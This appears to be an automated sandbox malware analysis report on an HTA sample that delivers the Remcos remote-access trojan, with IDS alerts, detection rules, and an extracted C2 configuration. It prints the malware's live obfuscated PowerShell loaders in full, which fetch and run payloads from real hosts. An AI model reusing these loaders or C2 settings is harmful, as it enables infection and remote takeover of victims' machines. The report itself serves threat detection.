"C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'JFFVICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNreXNEeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmeUF5YmEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRmZIaEgsdWludCAgICAgICAgICAgICAgICAgICAgICA
                    Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F, b4Fdesativadob4'+'F, b4Fdesativadob4F, b4FCasPol'+'b4F, b4Fdesativadob4F, b4Fdesativadob'+'4F,b4Fdesativad'+'ob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob'+'4F,b4F1b4F,b4Fdesativadob4F));').REplaCe('b4F',[sTrIng][CHar]39).REplaCe('sHN','$').REplaCe('s7g','|') |& ( $Pshome[4]+$PSHOmE[30]+'X')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F,
                    Sigma detected: Windows Processes Suspicious Parent Directory
                    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7604, ProcessName: svchost.exe

                    Data Obfuscation

                    barindex
                    Sigma detected: Dot net compiler compiles file from suspicious location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'JFFVICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNreXNEeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmeUF5YmEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRmZIaEgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRqYyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPbXF1aGx2bUJJKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAid2prT094RWxYIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNd3VyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRVTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk0LjE3MS4xMzgvMzI5L2NyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlbmdvb2QudElGIiwiJGVuVjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyIsMCwwKTtzdGFSVC1zbGVFcCgzKTtpRXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyI='+[chAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7628, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.cmdline", ProcessId: 7900, ProcessName: csc.exe

                    Stealing of Sensitive Information

                    barindex
                    Sigma detected: Remcos
                    Source: Registry Key setAuthor: Joe Security: Data: Details: F3 E4 18 5A 10 18 60 73 71 CA 92 6C CF BA 0D C7 70 A9 83 0C BC 9C E3 09 15 6B C7 E9 29 02 5F 56 C7 9C 21 5C 15 31 4B ED 6F 4A E7 05 D3 DC 23 36 C1 98 FC B2 C8 8F 6B 35 7C D7 56 AF 23 69 76 CF EB CC D5 82 B6 E3 5C 13 63 80 FA DB 2F 66 9A 8C 9E C1 D5 47 29 87 2A 94 E4 D4 42 95 06 A5 A5 56 BB 67 A5 6F BE 87 C9 AF B9 7A 8F 51 DD 2F 2F CA 76 6A , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 3276, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-EC111K\exepath

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-18T16:52:56.864013+010020204251Exploit Kit Activity Detected23.94.171.13880192.168.2.855648TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-18T16:52:56.864013+010020204241Exploit Kit Activity Detected23.94.171.13880192.168.2.855648TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-18T16:53:21.663046+010020365941Malware Command and Control Activity Detected192.168.2.855649192.227.228.3614645TCP
                    2024-11-18T16:53:23.333996+010020365941Malware Command and Control Activity Detected192.168.2.855650192.227.228.3614645TCP
                    2024-11-18T16:53:23.948023+010020365941Malware Command and Control Activity Detected192.168.2.855652192.227.228.3614645TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-18T16:52:38.759543+010020490381A Network Trojan was detected142.215.209.78443192.168.2.849706TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-18T16:53:23.817150+010028033043Unknown Traffic192.168.2.855651178.237.33.5080TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-18T16:52:10.021973+010028582951A Network Trojan was detected23.94.171.13880192.168.2.855648TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-18T16:52:56.510461+010028587961A Network Trojan was detected192.168.2.85564823.94.171.13880TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-18T16:52:23.601751+010028587951A Network Trojan was detected192.168.2.84970523.94.171.13880TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for URL or domain
                    Source: nextnewupdationsforu.duckdns.orgAvira URL Cloud: Label: malware
                    Found malware configuration
                    Source: 0000000C.00000002.3861630082.0000000000F47000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["nextnewupdationsforu.duckdns.org:14645:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-EC111K", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                    Multi AV Scanner detection for submitted file
                    Source: seethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaReversingLabs: Detection: 21%
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.3861630082.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 752, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 3276, type: MEMORYSTR
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,12_2_0043293A
                    Source: powershell.exe, 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_5cb557c7-3

                    Exploits

                    barindex
                    Yara detected UAC Bypass using CMSTP
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 752, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 3276, type: MEMORYSTR

                    Privilege Escalation

                    barindex
                    Contains functionality to bypass UAC (CMSTPLUA)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406764 _wcslen,CoGetObject,12_2_00406764

                    Phishing

                    barindex
                    Yara detected HtmlPhish44
                    Source: Yara matchFile source: seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta, type: SAMPLE
                    Source: unknownHTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.8:49706 version: TLS 1.2
                    Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000A.00000002.1919215774.0000000006EA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1921977762.000000000756A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbd source: powershell.exe, 00000003.00000002.1482539113.0000000008462000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokenex`2dnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncount
                    Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000A.00000002.1919215774.0000000006EA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1921977762.000000000756A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbE source: powershell.exe, 00000003.00000002.1482460145.0000000008446000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: q8C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.pdb source: powershell.exe, 00000001.00000002.1589019492.0000000004CB1000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb4 source: powershell.exe, 00000003.00000002.1482539113.0000000008462000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000A.00000002.1921977762.000000000756A000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040B335
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,12_2_0041B42F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040B53A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0044D5E9 FindFirstFileExA,12_2_0044D5E9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,12_2_004089A9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406AC2 FindFirstFileW,FindNextFileW,12_2_00406AC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,12_2_00407A8C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00418C69
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,12_2_00408DA7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_045710F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,12_2_045710F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_04576580 FindFirstFileExA,12_2_04576580
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_10005C00 FindFirstFileW,FindNextFileW,FindNextFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,12_2_10005C00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_10007E20 Sleep,FindFirstFileW,RemoveDirectoryW,FindNextFileW,RemoveDirectoryW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_10007E20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_100073F0 FindFirstFileW,FindNextFileW,CreateFileW,FindNextFileW,FindClose,CloseHandle,FindClose,12_2_100073F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_10018AD0 FindFirstFileExA,12_2_10018AD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0040AE51 FindFirstFileW,FindNextFileW,18_2_0040AE51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,19_2_00407EF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,24_2_00407898
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00406F06

                    Software Vulnerabilities

                    barindex
                    Suspicious execution chain found
                    Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.8:49705 -> 23.94.171.138:80
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:55650 -> 192.227.228.36:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:55649 -> 192.227.228.36:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:55652 -> 192.227.228.36:14645
                    Source: Network trafficSuricata IDS: 2858796 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M1 : 192.168.2.8:55648 -> 23.94.171.138:80
                    Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 23.94.171.138:80 -> 192.168.2.8:55648
                    Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 23.94.171.138:80 -> 192.168.2.8:55648
                    Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 23.94.171.138:80 -> 192.168.2.8:55648
                    Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.215.209.78:443 -> 192.168.2.8:49706
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: nextnewupdationsforu.duckdns.org
                    Uses dynamic DNS services
                    Source: unknownDNS query: name: nextnewupdationsforu.duckdns.org
                    Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1Host: 1017.filemail.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /329/FRSSDE.txt HTTP/1.1Host: 23.94.171.138Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: Joe Sandbox ViewIP Address: 94.245.104.56 94.245.104.56
                    Source: Joe Sandbox ViewIP Address: 18.244.18.27 18.244.18.27
                    Source: Joe Sandbox ViewIP Address: 142.215.209.78 142.215.209.78
                    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:55651 -> 178.237.33.50:80
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.94.171.138
